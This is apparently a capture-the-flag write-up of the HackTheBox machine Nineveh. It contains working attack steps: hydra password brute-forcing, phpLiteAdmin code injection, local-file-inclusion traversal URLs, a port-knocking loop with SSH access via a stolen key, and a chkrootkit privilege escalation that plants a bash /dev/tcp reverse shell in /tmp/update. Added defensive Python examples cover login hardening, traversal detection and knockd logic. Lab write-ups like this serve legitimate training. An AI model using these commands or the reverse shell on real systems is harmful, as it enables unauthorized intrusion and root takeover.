First, scan the common ports with nmap. Only ports 80 and 443 are open, and I did not bother with a detailed service scan.
```
┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
└─$ nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-01 01:42 EDT
Nmap scan report for
Host is up (0.45s latency).
Not shown: 998 filtered tcp ports (no-response)
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 36.22 seconds
```
The two ports serve different content. Port 80 shows the following:
Port 443 shows the following:
There is nothing of interest on either web page, so I ran gobuster against the directories:
```
gobuster dir --url --wordlist /usr/share/dirb/wordlists/big.txt -o dir.80
gobuster dir --url --wordlist /usr/share/dirb/wordlists/big.txt -o dir.443 -k
```
The port-80 scan turned up a /department endpoint, which redirects to /department/login.php. Logging in with the common credentials admin/123456 returns "invalid password", whereas using vegetable as the username returns "invalid username", which confirms that the username is admin.
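The differing error messages are a username-enumeration weakness. The following is an added illustration (not code from the box or the original post) that contrasts the behaviour observed at /department/login.php with a login check that returns one generic message and does a constant-time comparison; the user store, salt and passwords are constructed for the demo.

```python
import hashlib
import hmac
import os

# Constructed user store for the demo; a real app stores a slow password
# hash (bcrypt/scrypt/argon2). sha256 is used here only to avoid dependencies.
_SALT = b"demo-salt"
USERS = {"admin": hashlib.sha256(_SALT + b"correct-horse").hexdigest()}
# Random dummy hash compared against when the user does not exist, so the
# unknown-user path does the same amount of work as the known-user path.
_DUMMY_HASH = hashlib.sha256(_SALT + os.urandom(16)).hexdigest()


def _hash(password: str) -> str:
    return hashlib.sha256(_SALT + password.encode()).hexdigest()


def vulnerable_login(username: str, password: str) -> str:
    """Mirrors what the page observed: the error text tells the caller
    whether the username exists, so valid usernames can be confirmed
    before any password guessing starts."""
    if username not in USERS:
        return "invalid username"
    if USERS[username] != _hash(password):
        return "invalid password"
    return "ok"


def hardened_login(username: str, password: str) -> str:
    """Same check, but a single message for both failure cases and a
    constant-time comparison (against a dummy hash for unknown users),
    so neither the response text nor the timing reveals which part failed."""
    stored = USERS.get(username, _DUMMY_HASH)
    if hmac.compare_digest(stored, _hash(password)) and username in USERS:
        return "ok"
    return "invalid username or password"
```

Pair the uniform message with per-account and per-source rate limiting; the hydra runs later on this page succeed precisely because nothing slowed 197 guesses in a few seconds.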
With no password, and not wanting to brute-force just yet, I looked at the directory scan of port 443 and found a /db endpoint. Visiting it shows the following page:
phpLiteAdmin is a web-based SQLite database management tool written in PHP that supports SQLite3 and SQLite2. In the spirit of the flat-file design used by SQLite, phpLiteAdmin consists of a single source file, phpliteadmin.php, which is dropped into a directory on the server and then accessed from a browser.
The one I am most interested in is the last one: the version matches and it allows command execution, but it requires logging in first. phpLiteAdmin only asks for a password, so I tried brute-forcing it with hydra. Even though only the password needs to be guessed, hydra still requires a username, even if it may not actually be used; here I specified admin and picked a fairly small wordlist, and got the answer quickly:
```
┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
└─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 03:42:54
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
[DATA] attacking http-post-forms://^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
[443][http-post-form] host: login: admin password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 03:43:34
```
The password was found quickly. Log in with password123, then follow PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com) for the exploitation:
1. Create a new database named hack.php
2. Create a new table with a TEXT-type field, with Value set to:
3. After the creation succeeds, click Rename Database to see the path.
But that file could not be accessed, so this lead went cold. Back to port 80: since the username is confirmed to be admin, I tried brute-forcing the login, and got the result very quickly:
```
┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 04:53:05
[DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
[DATA] attacking http-post-form://^PASS^:Invalid Password
[80][http-post-form] host: login: admin password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 04:53:19
```
After logging in with these credentials, clicking Notes shows the text below. The mention of a "secret folder" and the format of the URL both look like LFI.
Testing: appending …manage.php?notes=../../../../../../../etc/passwd directly shows "No Note is selected"; adding /files/ninevehNotes.txt gives an error instead. After some attempts I found that appending 7 ../ after the txt successfully includes the file.
But when I used manage.php?notes=files/ninevehNotes/../../../../../../../var/tmp/hack.php to include the hack.php created earlier, it showed "File name too long." After I removed one ../, hack.php was included successfully and commands could be executed.
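The requests above all pass the notes parameter straight into an include. The following added example (not code from the box or the original post) shows the check the application should have made, which rejects any notes value that resolves outside the notes directory once decoded and normalised, and a scan of constructed Apache access-log lines that flags the traversal requests used on this page. The base directory name and the log lines (with placeholder IP addresses) are assumptions made for the demo.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed: notes are served from this directory under the web root, so the
# include never needs a path that resolves anywhere else.
NOTES_BASE = "files"


def is_safe_note_path(requested: str) -> bool:
    """True only if the requested path, after URL decoding (twice, to
    cover double encoding) and normalisation, still sits inside NOTES_BASE.
    Absolute paths, NUL bytes and ../ sequences that climb out are rejected."""
    decoded = unquote(unquote(requested))
    if decoded.startswith("/") or "\x00" in decoded:
        return False
    normalised = posixpath.normpath(decoded)
    return normalised == NOTES_BASE or normalised.startswith(NOTES_BASE + "/")


# Apache combined log format: client ip, identd, user, [time], "METHOD url ..."
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<url>\S+)')


def find_traversal_requests(log_lines):
    """Return (client_ip, notes_value) for every manage.php request whose
    notes parameter fails is_safe_note_path(); feed this your access log."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or "manage.php" not in m.group("url"):
            continue
        params = parse_qs(urlsplit(m.group("url")).query)
        for notes in params.get("notes", []):
            if not is_safe_note_path(notes):
                hits.append((m.group("ip"), notes))
    return hits


# Constructed sample log lines; 203.0.113.5 is a documentation address, not the box.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Apr/2024:05:10:01 -0400] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Apr/2024:05:10:09 -0400] "GET /department/manage.php?notes=../../../../../../../etc/passwd HTTP/1.1" 200 88',
    '203.0.113.5 - - [01/Apr/2024:05:10:22 -0400] "GET /department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/hack.php HTTP/1.1" 200 41',
]
```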
A reverse shell can be generated with Online - Reverse Shell Generator (revshells.com); once it runs, the listener receives a shell:
```
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 33734
bash: cannot set terminal process group (1412): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nineveh:/var/www/html/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<tml/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@nineveh:/var/www/html/department$ ^Z
zsh: suspended nc -nvlp 4444
┌──(kali㉿kali)-[~]
└─$ stty raw -echo;fg
[1] + continued nc -nvlp 4444
reset
reset: unknown terminal type unknown
Terminal type? screen
```
With a www-data shell in hand, I found an image, nineveh.png, in /var/www/ssl/secure_notes. Opening it with cat shows the RSA key below; strings gives a cleaner view. Copy the private key to the Kali machine and set its permissions to 600 so it can later be used to connect to the SSH service.
The initial nmap scan did not show port 22, so port knocking is required.
```
www-data@nineveh:/var/www/ssl/secure_notes$ netstat -anultp | grep 22
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
```
The knockd daemon installs firewall rules when ports are hit in a particular order; its configuration file is shown below. If ports 571, 290 and 911 are hit in that order within 5 seconds, the knock succeeds and port 22 is opened to the knocking address.
```
www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
[options]
logfile = /var/log/knockd.log
interface = ens160
[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
```
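To make the sequence and seq_timeout settings concrete, here is an added, simplified model of knockd's matching logic (illustration only, not knockd's own code): it tracks per source address how far into the sequence a client has got, drops the attempt on a wrong port or when the timeout since the first knock elapses, and reports when start_command would fire with %IP% substituted. The same class with sequence (911, 290, 571) models the closeSSH door. The sequence, timeout and start_command values are taken from the configuration above; the IP addresses in the test are placeholders.

```python
# Values copied from the [openSSH] section of /etc/knockd.conf above.
OPEN_SEQUENCE = (571, 290, 911)
SEQ_TIMEOUT = 5.0
START_COMMAND = "/sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT"


class KnockTracker:
    """Simplified knockd door: one in-progress attempt per source address,
    stored as (knocks matched so far, time of the first knock)."""

    def __init__(self, sequence=OPEN_SEQUENCE, timeout=SEQ_TIMEOUT,
                 start_command=START_COMMAND):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        self.start_command = start_command
        self.attempts = {}        # src_ip -> (index, start_time)
        self.commands_run = []    # start_command lines that would be executed

    def observe_syn(self, src_ip: str, dport: int, now: float) -> bool:
        """Feed one TCP SYN (tcpflags = syn). Returns True exactly when the
        full sequence has been seen in order within seq_timeout seconds."""
        idx, start = self.attempts.get(src_ip, (0, now))
        if idx and now - start > self.timeout:
            idx, start = 0, now               # previous attempt expired
        if dport != self.sequence[idx]:
            self.attempts.pop(src_ip, None)   # wrong port: discard the attempt
            return False
        if idx == 0:
            start = now                       # timer runs from the first knock
        idx += 1
        if idx == len(self.sequence):
            self.attempts.pop(src_ip, None)
            self.commands_run.append(self.start_command.replace("%IP%", src_ip))
            return True
        self.attempts[src_ip] = (idx, start)
        return False
```

Because the rule is keyed on %IP%, the knock only opens port 22 for the address that knocked, which is why the scan from Kali had to come from the same host that later connects over SSH.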
See Port knocking - ArchWiki (archlinux.org) for how to perform the knock. Since there are only 5 seconds, a for loop can run nmap -Pn --host-timeout 100 --max-retries 0 -p $i for each port automatically; once all the ports have been hit, port 22 is opened, and id_rsa can be used to connect to the SSH service:
```
┌──(kali㉿kali)-[~]
└─$ for i in 571 290 911; do
nmap -Pn --host-timeout 100 --max-retries 0 -p $i
done; ssh -i vegetable/HTB/Nineveh/id_rsa amrois@
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: giving up on port because retransmission cap hit (0).
Nmap scan report for
Host is up.
571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: giving up on port because retransmission cap hit (0).
Nmap scan report for
Host is up.
290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: giving up on port because retransmission cap hit (0).
Nmap scan report for
Host is up.
911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
288 packages can be updated.
207 updates are security updates.
You have mail.
Last login: Mon Jul 3 00:19:59 2017 from
amrois@nineveh:~$
```
After logging in, user.txt is in the current directory.
Upload linpeas.sh to enumerate system weaknesses. It reveals a scheduled task: the report directory holds many report.txt files, and /usr/sbin/report-reset.sh periodically deletes them.
```
amrois@nineveh:/report$ ls -al
total 56
drwxr-xr-x 2 amrois amrois 4096 Apr 2 02:05 .
drwxr-xr-x 24 root root 4096 Jan 29 2021 ..
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:00 report-24-04-02:02:00.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:01 report-24-04-02:02:01.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:02 report-24-04-02:02:02.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:03 report-24-04-02:02:03.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:04 report-24-04-02:02:04.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:05 report-24-04-02:02:05.txt
```
Uploading and running pspy shows a burst of tasks every minute, many of which invoke the chkrootkit tool. A search shows that this tool has a local privilege escalation vulnerability:
```
┌──(kali㉿kali)-[~]
└─$ searchsploit chkrootkit
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
The vulnerability is simply that the program periodically executes the file /tmp/update as root, so it is enough to create an update file under /tmp containing a reverse shell script:
```
amrois@nineveh:/tmp$ cat update
#!/bin/bash
bash -i >& /dev/tcp/ 0>&1
```
After a short wait, the listener receives the shell.
